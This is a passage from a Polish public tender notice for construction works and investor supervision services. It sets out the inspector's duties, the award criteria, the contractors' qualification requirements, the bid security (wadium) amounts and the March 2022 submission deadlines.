wbudowanych wyrobów, a w szczególności<br/>zapobieganie stosowania wyrobów wadliwych niedopuszczonych do obrotu i stosowania w<br/>budownictwie,<br/>9) sprawdzenie zgodności wykonanych robót z zatwierdzoną dokumentacją, standardami,<br/>projektami wykonawczymi i zasadami bezpieczeństwa,<br/>10) bieżąca kontrola jakości wykonywanych robót oraz dokumentów: atestów i świadectw<br/>jakości<br/>dla materiałów wbudowywanych, kompletowanie na bieżąco dokumentacji powykonawczej,<br/>11) sprawdzenie zgodności urządzeń, materiałów i elementów z wymaganymi certyfikatami i<br/>świadectwami wyrobów, deklaracjami zgodności,<br/>12) sprawdzanie i odbiór robót zanikających, uczestniczenie w próbach i odbiorach<br/>technicznych oraz przygotowanie i udział w odbiorze robót,<br/>13) potwierdzenie faktycznie wykonanych prac oraz kontrola usunięcia wad,<br/>14) wydawanie kierownikowi budowy poleceń, potwierdzonych wpisem do dziennika budowy,<br/>15) żądanie od kierownika budowy dokonania poprawek bądź ponownego wykonania wadliwie<br/>wykonanych prac, a także wstrzymania dalszych robót w przypadku, gdyby ich kontynuacja<br/>wywoływała zagrożenia bądź powodowała niedopuszczalną niezgodność z projektem,<br/>16) nadzorowanie doprowadzenia obiektu oraz terenu budowy do stanu z przed rozpoczęcia<br/>robót<br/>budowlanych,<br/>17) obecność na budowie potwierdzona wpisem do dziennika budowy, w tym udział w<br/>spotkaniach<br/>i naradach dotyczących realizacji robót;<br/>18) bieżąca kontrola wykonania i sprawdzenie dokumentacji powykonawczej,<br/>19) prowadzenie nadzoru inwestorskiego, w przypadku wystąpienia robót dodatkowych,<br/>zamiennych, bez żądania dodatkowego wynagrodzenia,<br/>20) nadzorowanie wykonania dokumentacji powykonawczej,<br/>21) żądanie od wykonawcy robót dołączenia do protokołu odbioru robót budowlanych,<br/>stanowiącego załącznik do faktury, deklaracji zgodności, certyfikatów na zastosowane materiały,<br/>dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych i urządzeń<br/>technicznych występujących w tych protokołach;<br/>22) weryfikacja dokumentów złożonych przez Wykonawcę robót budowlanych dotyczących<br/>ewentualnej waloryzacji ceny umowy;<br/>23) weryfikacja dokumentów złożonych przez Wykonawcę robót budowlanych dotyczących<br/>ewentualnego wcześniejszego przerwania robót przed zakończeniem realizacji przedmiotu<br/>umowy.<br/>a) Wykonawca zobowiązany będzie również w ramach zaproponowanego wynagrodzenia w<br/>okresie gwarancji do:<br/>1) uczestnictwa w przeglądach gwarancyjnych i rozwiązywania sporów ,<br/>2) uczestnictwa w odbiorze usuniętych usterek, wad ujawnionych w przeglądach gwarancyjnych,<br/>3) sporządzania dokumentacji z przeglądów gwarancyjnych obejmujących: wykaz usterek i wad, wskazania przyczyn powstania usterek i podanie zaleceń odnośnie ich usunięcia, sporządzanie<br/>kosztorysu dot. powstałych usterek i wad;<br/>4) nadzoru nad robotami wykonywanymi przez wykonawcę w ramach usunięcia stwierdzonych<br/>wad i usterek,<br/>5) udziału w pogwarancyjnym odbiorze robót,<br/>6) w okresie gwarancji udzielonej przez wykonawcę robót, usługodawca musi być dostępny na<br/>żądanie zamawiającego w celu nadzorowania wykonywanych robót i odbioru,<br/>7) inne czynności niezbędne do prawidłowego pełnienia nadzoru inwestorskiego.<br/>Inspektor Nadzoru Inwestorskiego uczestniczy we wszelkich sporach ( w tym również przed<br/>sadem powszechnym ) z Wykonawcą reprezentując Zamawiającego.<br/>2. Wyklucza się możliwość pełnienia na tej samej budowie funkcji kierownika budowy i<br/>inspektora nadzoru przez jedna osobę.<br/>3. Inwestor ustanawia funkcję inspektora koordynatora, którą powierza inspektorowi w<br/>specjalności konstrukcyjno-budowlanej, który będzie odpowiedzialny również za<br/>skoordynowanie działań pozostałych inspektorów branży sanitarnej i eklektycznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która przedstawi najkorzystniejszy bilans (maksymalna liczba<br/>przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe<br/>oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Zamawiający udzieli zamówienia<br/>Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający nie będzie<br/>prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu<br/>ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osoby wyznaczonej do realizacji zamówienia w specjalności konstrukcyjno - budowlanej bez ograniczeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zadanie 1; Zadanie 2<br/>4.1. Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich pięciu lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie wykonał należycie minimum jedną robotę budowlaną polegającą na budowie,<br/>przebudowie, rozbudowie obiektów kubaturowych użyteczności publicznej lub budynków<br/>mieszkalnych wielorodzinnych w rozumieniu §3 pkt. 4) i 6) Rozporządzenia Ministra<br/>Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny<br/>odpowiadać budynki i ich usytuowanie (t.j. Dz. U. z 2019 r. poz. 1065 z późn. zm.) o wartości nie<br/>mniejszej niż: 2 000 0000,00 zł brutto.<br/>4.2. Zamawiający wymaga, aby Wykonawca wykazał, że będzie dysponował co najmniej 1<br/>osobą o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym<br/>do wykonania zamówienia to jest:<br/>kierownik budowy (pełniący jednocześnie rolę kierownika robót) – minimalne wymagania:<br/>􀀀 posiadający uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z<br/>przedmiotem zamówienia w specjalności konstrukcyjno-budowlanej,<br/>􀀀 osobą posiadającą co najmniej 4 letnie doświadczenie zawodowe, prawo do pełnienia<br/>samodzielnych funkcji technicznych w budownictwie bez ograniczeń lub odpowiadające im<br/>równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane oraz ważne<br/>zaświadczenie o przynależności do właściwej izby samorządu zawodowego;<br/>kierownik robót branży sanitarnej – minimalne wymagania:<br/>􀀀 posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>􀀀 prawo do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń lub<br/>odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane<br/>oraz ważne zaświadczenie o przynależności do właściwej izby samorządu zawodowego;<br/>kierownik robot branży elektrycznej – minimalne wymagania:<br/>􀀀 posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych,<br/>􀀀 prawo do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń lub<br/>odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane<br/>oraz ważne zaświadczenie o przynależności do właściwej izby samorządu zawodowego;<br/>Zadanie 3<br/>4.3. Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich pięciu lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie wykonał należycie minimum jedną usługę polegająca na nadzorze inwestorskim robót<br/>budowlanych polegającą na budowie, przebudowie, rozbudowie obiektów kubaturowych<br/>użyteczności publicznej lub budynków mieszkalnych wielorodzinnych w rozumieniu §3 pkt. 4) i<br/>6) Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków<br/>technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (t.j. Dz. U. z 2019 r. poz.<br/>1065 z późn. zm.) o wartości min. 1 000 000,00 zł brutto.<br/>4.4. Zamawiający wymaga, aby Wykonawca wykazał, że będzie dysponował co najmniej 1<br/>osobą o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnym<br/>do wykonania zamówienia to jest:<br/>- - min. 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie,<br/>posiadającą odpowiednie uprawnienia budowlane do nadzorowania robót budowlanych w<br/>specjalności konstrukcyjno - budowlanej bez ograniczeń oraz posiadającą co najmniej 4 letnie<br/>doświadczenie zawodowe, prawo do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej<br/>specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów, zgodnie<br/>z wymogami ustawy Prawo budowlane oraz ważne zaświadczenie o przynależności do<br/>właściwej izby samorządu zawodowego;<br/>- min. 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie,<br/>posiadającą odpowiednie uprawnienia budowlane do nadzorowania robót w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych oraz prawo do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej<br/>specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów, zgodnie<br/>z wymogami ustawy Prawo budowlane oraz ważne zaświadczenie o przynależności do<br/>właściwej izby samorządu zawodowego;<br/>- min. 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie,<br/>posiadającą odpowiednie uprawnienia budowlane do nadzorowania robót w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz<br/>prawo do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń lub<br/>odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane<br/>oraz ważne zaświadczenie o przynależności do właściwej izby samorządu zawodowego;<br/>W/w wymienione osoby winny posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07<br/>lipca l 994r. Prawo Budowlane (tekst jedn. Dz.U. z 2020 r. poz. 256 ze zm.) oraz<br/>rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r w sprawie<br/>samodzielnych funkcji technicznych w budownictwie (tekst jedn. Dz. U z 2014 r. poz. 1278) lub<br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów.<br/>Zgodnie z art. 12 a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie,<br/>określone w art. 12 ust.I ustawy mogą również wykonywać osoby, których odpowiednie<br/>kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.<br/>Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity<br/>Dz. U. 2008. 63.394 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zadanie 1, 2, 3<br/>-odpisu lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zadanie 1, Zadanie 2<br/>1) Wykaz robót budowlanych - minimum jedną robotę budowlaną polegającą na budowie,<br/>przebudowie, rozbudowie obiektów kubaturowych użyteczności publicznej lub budynków mieszkalnych<br/>wielorodzinnych w rozumieniu §3 pkt. 4) i 6) Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia<br/>2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (t.j.<br/>Dz. U. z 2019 r. poz. 1065 z późn. zm.) o wartości nie mniejszej niż: 2 000 0000,00 zł brutto. wykonaną<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca<br/>wykonania i podmiotów, na rzecz których roboty te zostały wykonane należycie, w szczególności<br/>informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo<br/>ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione<br/>przez podmiot, na rzecz którego roboty budowlane były wykonywane. Przez jedną robotę rozumie się<br/>zamówienie wykonane/wykonywane w ramach jednego kontraktu (umowy). -załącznik nr 4 do SWZ.<br/>Wykaz osób skierowanych przez Wykonawcę do realizacji –co najmniej 1 osoba<br/>–kierownik budowy (pełniący jednocześnie rolę kierownika robót) – minimalne wymagania:<br/>􀀀 posiadający uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z przedmiotem<br/>zamówienia w specjalności konstrukcyjno-budowlanej,<br/>􀀀 osobą posiadającą co najmniej 4 letnie doświadczenie zawodowe, prawo do pełnienia<br/>samodzielnych funkcji technicznych w budownictwie bez ograniczeń lub odpowiadające im<br/>równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane oraz ważne zaświadczenie<br/>o przynależności do właściwej izby samorządu zawodowego;<br/>- kierownik robót branży sanitarnej – minimalne wymagania:<br/>􀀀 posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych;<br/>􀀀 prawo do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń lub<br/>odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane oraz ważne<br/>zaświadczenie o przynależności do właściwej izby samorządu zawodowego;<br/>- kierownik robot branży elektrycznej – minimalne wymagania:<br/>􀀀 posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych,<br/>􀀀 prawo do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń lub<br/>odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane oraz ważne<br/>zaświadczenie o przynależności do właściwej izby samorządu zawodowego;<br/>wraz z informacjami na temat: danych personalnych (imię i nazwisko) osób skierowanych przez<br/>Wykonawcę do realizacji zamówienia, ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzonego wg wzoru stanowiącego - załącznik nr 5 do SWZ.<br/>Ze względu na ograniczoną liczbę znaków wykaz podmiotowych środków dowodowych dla zadania 3 znajduje się w SEKCJI IX ogłoszenia &#34;Informacje dodatkowe&#34;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę składa się:<br/>a) formularzu ofertowym – zgodnie z Załącznikiem nr 1 do SWZ;<br/>b) oświadczenie, o którym mowa w Rozdziale X pkt. 1 SWZ;<br/>c) dokumenty, o których mowa w Rozdziale XII (jeżeli dotyczy);<br/>d) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI pkt. 3 SWZ (jeżeli dotyczy);<br/>e) dokumenty, z których wynika prawo do podpisania oferty; pełnomocnictwo (jeżeli dotyczy);<br/>f) dokument wniesienia wadium w innej formie niż pieniądz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>Zadanie 1 – 40 000,00 zł (słownie: czterdzieści tysięcy złotych 00/100);.<br/>Zadanie 2 – 20 000,00 zł słownie: dwadzieścia tysięcy złotych 00/100);.<br/>2. Wadium wnosi się przed upływem terminu składania ofert. Wadium musi obejmować pełen<br/>okres związania ofertą.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto 65 1020 4753 0000 0202<br/>0038 7357 PKO BP S.A z dopiskiem „Wadium w post. RRG.271.2.2022, Zadanie 1,2,3<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania<br/>rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji<br/>lub poręczenia w postaci elektronicznej i musi obejmować cały okres związania ofertą.<br/>6. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej w ich<br/>treści winien znajdować się zapis o tym, że jest ona nieodwołalna, bezwarunkowa i płatna na<br/>pierwsze żądanie Zamawiającego. Zapłata musi nastąpić niezależnie od ewentualnych<br/>zastrzeżeń Wykonawcy. Zamawiającemu powinno przysługiwać prawo dochodzenia należności<br/>zabezpieczonych gwarancją bezpośrednio od wystawcy gwarancji. Niedopuszczalne są zapisy<br/>uzależniające zapłatę przez gwaranta sumy gwarancyjnej od wcześniejszego żądania zapłaty<br/>należności od Wykonawcy.<br/>7. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie<br/>utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot<br/>wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona na<br/>podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8. Okoliczności i zasady zwrotu wadium określa art. 98 ust. 1 - 5 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni<br/>wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 5. Wypłata wynagrodzenia Wykonawcy będzie zgodna z zasadami wypłat dofinansowania wskazanymi we wstępnej promesie z Rządowego Funduszu Polski Ład Programu Inwestycji Strategicznych: <br/>Dotyczy zadania 1 i 2:<br/>W przypadku Inwestycji realizowanych w okresie nie dłuższym niż 12 miesięcy - Wykonawcy zostanie udzielona zaliczka w wysokości 5% wynagrodzenia. Pozostała cześć wynagrodzenia w wysokości 10% zostanie wypłacona w miarę postępu prac na podstawie jednej faktury częściowej, reszta wynagrodzenia po zakończeniu realizacji zamówienia na podstawie jednej faktury końcowej.<br/>Dotyczy zadania 3:<br/>Rozliczenie za wykonanie przedmiotu Umowy nastąpi na podstawie jednej faktury końcowej.<br/>Sposób wypłaty, zabezpieczenia i rozliczenia zaliczki zgodnie z wzorem umowy - załącznik nr 6 SWZ - Zadanie 1,2 . <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmiany umowy oraz warunki ich wprowadzenia zgodnie z wzorem umowy -<br/>załącznik nr 6 SWZ -Zadanie 1,2 oraz Załącznik nr 6 SWZ -Zadanie 3 . <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ugg</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający korzysta z uprawnienia, o jakim stanowi art. 288 ust. 1 ustawy Pzp i zastrzega<br/>sobie prawo do zaproszenia do negocjacji maksymalnie trzech Wykonawców, których oferty<br/>przedstawiają najkorzystniejszy stosunek jakości do ceny, obliczony na podstawie kryteriów<br/>oceny ofert, określonych w Dziale XIX SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w<br/>postępowaniu:<br/>Zadanie 3<br/>1) Wykaz Usług - minimum jedną usługę polegająca na nadzorze inwestorskim robót<br/>budowlanych polegającą na budowie, przebudowie, rozbudowie obiektów kubaturowych<br/>użyteczności publicznej lub budynków mieszkalnych wielorodzinnych w rozumieniu §3 pkt. 4) i<br/>6) Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków<br/>technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (t.j. Dz. U. z 2019 r. poz.<br/>1065 z późn. zm.) o wartości min. 1 000 000,00 zł brutto wykonaną w okresie ostatnich pięciu lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na<br/>rzecz których usługi te zostały wykonane należycie, w szczególności informacje o tym czy usługi<br/>zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym<br/>dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego usługi były wykonywane. Przez jedną usługę rozumie się zamówienie<br/>wykonane/wykonywane w ramach jednego kontraktu (umowy). -załącznik nr 4 do SWZ.<br/>2) Wykaz osób skierowanych przez Wykonawcę do realizacji:<br/>- min. 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie,<br/>posiadającą odpowiednie uprawnienia budowlane do nadzorowania robót budowlanych w<br/>specjalności konstrukcyjno - budowlanej bez ograniczeń oraz posiadającą co najmniej 4 letnie<br/>doświadczenie zawodowe, prawo do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej<br/>specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów, zgodnie<br/>z wymogami ustawy Prawo budowlane oraz ważne zaświadczenie o przynależności do<br/>właściwej izby samorządu zawodowego;<br/>- min. 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie,<br/>posiadającą odpowiednie uprawnienia budowlane do nadzorowania robót w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych oraz prawo do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej<br/>specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów, zgodnie<br/>z wymogami ustawy Prawo budowlane oraz ważne zaświadczenie o przynależności do<br/>właściwej izby samorządu zawodowego;<br/>- min. 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie,<br/>posiadającą odpowiednie uprawnienia budowlane do nadzorowania robót w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz<br/>prawo do pełnienia samodzielnych funkcji technicznych w budownictwie 